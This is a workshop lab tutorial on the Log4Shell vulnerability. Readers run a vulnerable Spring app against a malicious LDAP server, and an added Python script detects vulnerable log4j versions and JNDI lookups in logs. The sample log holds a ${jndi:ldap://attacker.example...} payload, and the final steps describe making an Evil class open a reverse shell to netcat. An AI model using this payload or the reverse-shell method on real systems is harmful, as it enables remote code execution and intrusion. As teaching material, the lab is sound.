The Log4J incident from December 2021 was one of the biggest and most impactful security issues in recent Java history.
In this minilab, we will look into the vulnerability and try to create our own server.
```shell
git clone https://github.com/bmvermeer/log4j-minilab.git
```

The repository contains an application and a template for a malicious log4shell server.

Start the vulnerable application:

```shell
cd log4japp
./mvnw compile spring-boot:run
```

Start the log4shell server:

```shell
cd log4shell-server
./mvnw compile exec:java
```
The application contains a vulnerable Log4j version. It evaluates JNDI lookups, and you can point it at an LDAP server that you own to achieve arbitrary code execution. The log4shell-server already contains an incomplete LDAP server based on the marshalsec project by Moritz Bechler. This server returns a reference to Evil.class, which is served to the application by an HTTP server. Both the LDAP server and the HTTP server are fully functional.
- Start up the log4japp
- Go to http://localhost:8080/
- Try to log in with an incorrect username and password.
- See in the console what is logged.
- Check whether the application uses a log4j version that is vulnerable (< 2.15).
- Hint 1
- Start up the log4shell-server and try to connect to the server.
- If the console gives you a `javax.naming.NamingException` with `Root exception is java.lang.ClassCastException`, then you are in the right spot.
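Two of the steps above, reading what the console logs and checking the log4j version, are also the checks a defender runs against an application like this one. The script below is an added example and is not part of the log4j-minilab repository; the pom.xml and the console lines it works on are constructed sample input, and `attacker.example` is a placeholder host. It reads the declared `log4j-core` version out of a Maven pom (resolving a `${property}` reference), applies the lab's `< 2.15` cut-off, and flags console lines that contain a `${jndi:...}` lookup, which is what a vulnerable Log4j 2 would try to resolve.

```python
"""Defender-side checks for the Log4Shell minilab.

Added example; it is not part of the bmvermeer/log4j-minilab repository.
The pom.xml and the log lines below are constructed sample input.

- find_log4j_core_version(): reads the log4j-core version declared in a
  Maven pom.xml, resolving a ${property} reference from <properties>.
- is_vulnerable_version(): applies the lab's cut-off (< 2.15.0) to the
  main 2.x release line.
- find_jndi_lookups(): flags log lines containing a ${jndi:...} lookup,
  i.e. what a vulnerable Log4j 2 would try to resolve.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample pom.xml: version pinned through a Maven property.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <properties>
    <log4j.version>2.14.1</log4j.version>
  </properties>
  <dependencies>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-core</artifactId>
      <version>${log4j.version}</version>
    </dependency>
  </dependencies>
</project>
"""

# Constructed sample console output in the style of the lab's failed-login log;
# "attacker.example" is a placeholder host, not a real target.
SAMPLE_LOG = [
    "INFO  LoginController - Login failed for user: alice",
    "INFO  LoginController - Login failed for user: ${jndi:ldap://attacker.example:1389/a}",
    "INFO  LoginController - Login failed for user: bob",
]

# A message lookup starts with "${jndi:"; Log4j treats the prefix case-insensitively.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)


def find_log4j_core_version(pom_xml):
    """Return the declared log4j-core version, or None if it is not pinned
    in this pom (e.g. managed by a parent/BOM; then check `mvn dependency:tree`)."""
    root = ET.fromstring(pom_xml)
    # Maven poms usually carry a default namespace; handle both namespaced and bare tags.
    ns = root.tag[: root.tag.index("}") + 1] if root.tag.startswith("{") else ""

    def text(el, tag):
        child = el.find(ns + tag)
        return child.text.strip() if child is not None and child.text else None

    props = {p.tag[len(ns):]: (p.text or "").strip()
             for p in root.findall(f"{ns}properties/*")}
    for dep in root.iter(ns + "dependency"):
        if text(dep, "groupId") == "org.apache.logging.log4j" and \
           text(dep, "artifactId") == "log4j-core":
            version = text(dep, "version")
            if version is None:
                return None
            m = re.fullmatch(r"\$\{(.+)\}", version)
            return props.get(m.group(1)) if m else version
    return None


def parse_version(version):
    """'2.14.1' -> (2, 14, 1); qualifiers such as '-rc1' are ignored."""
    parts = [int(x) for x in re.findall(r"\d+", version)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def is_vulnerable_version(version):
    """Lab cut-off: anything below 2.15.0 on the main release line.
    The Java 7/6 backport branches (2.12.x, 2.3.x) received their own fixes
    and would be misreported by this simple comparison."""
    return parse_version(version) < (2, 15, 0)


def find_jndi_lookups(lines):
    """Return (line_number, line) for every line that contains a JNDI lookup."""
    return [(n, line) for n, line in enumerate(lines, 1) if JNDI_LOOKUP.search(line)]


if __name__ == "__main__":
    version = find_log4j_core_version(SAMPLE_POM)
    if version is None:
        print("log4j-core version not pinned in pom.xml; run `mvn dependency:tree`")
    else:
        print(f"log4j-core {version}  vulnerable (< 2.15): {is_vulnerable_version(version)}")
    for n, line in find_jndi_lookups(SAMPLE_LOG):
        print(f"JNDI lookup in console line {n}: {line}")
```

Run it against the lab's own `log4japp/pom.xml` and the console output you saw after the failed login; a version below 2.15.0 together with a logged `${jndi:` string is exactly the combination the next steps rely on.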
Implement the class Evil so that it prints “HACKED AT DEVOXXUK” when it is loaded using the LDAP string from before.
For instance, open the calculator on your machine.
- Install netcat on your machine
- Open netcat and listen on port 9001 (in a new shell window)
- Edit your Evil class so that it opens a connection to your (local) host on port 9001
- If everything works out, netcat is now connected to your machine and you have shell access. Imagine doing this on a remote machine :)